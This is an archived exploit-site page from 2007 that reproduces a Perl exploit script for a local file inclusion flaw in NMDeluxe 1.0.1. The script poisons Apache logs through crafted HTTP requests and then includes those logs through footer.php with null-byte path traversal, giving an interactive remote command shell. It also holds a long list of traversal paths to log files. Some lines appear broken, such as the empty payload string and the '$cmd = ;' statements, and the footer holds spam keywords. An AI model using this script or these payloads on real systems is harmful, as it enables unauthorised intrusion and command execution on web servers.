about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit



2007-04-16 NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit
Rated as : High Risk

# Perl
#
# BeyazKurt B3yazKurt@Hotmail.Com
#
# NMDeluxe 1.0.1 (template) Local File Inclusion Exploit
#
# D0rk     : "powered by NMDeluxe" dorka gerenk yok ama nese :p
#
# Dün trojen yedim a.q ! başka türlü yapamaz zate
lamerler
#
# Download : http://wsdeluxe.com/nmdeluxe/downloads.html Your Name & Site
URL :p
#
#Coded by elden ele ge穯 :)
#

use IO::Socket;
use LWP::Simple;
#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3) {
print "
NMDeluxe 1.0.1 (template) Local File Inclusion Exploit
###############################################################
Kullan.m : beyazkurt.pl [victim] [apachepath]
###############################################################
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$host",
PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = ;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$host",
PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
print $socket "GET
".$path."/includes/footer.php?template=".$apache[$apachepath]."%00&cmd=$cmd
HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = ;

securitydot.net - 2007-04-16

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 17:51:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.kaka31 sexgirlpho viedo www.ecodee WWW.BADGRI Oday www.ecodee ts 230 sor www.57886. global ann vlc PureFtpt girls sexi linux 2.6. free anima www.iteshu mambo Remo sexy photo WWW.Hotswe malayalam carlos_mon CMS is Fre Www.securi www.worldc 200+%252Fi hinh anh d config/con wwwindinse www.55175. www.se06.c HEROINS Chathurika Bangla+sex SEX SEX runpath www.so5eo. Fotobug jshuwei.or pornosma www.rtyes. saxy,video www.school news for c t106t www.tangha rar pass Crack Data FORM DS-23 all cartoo www.sxecom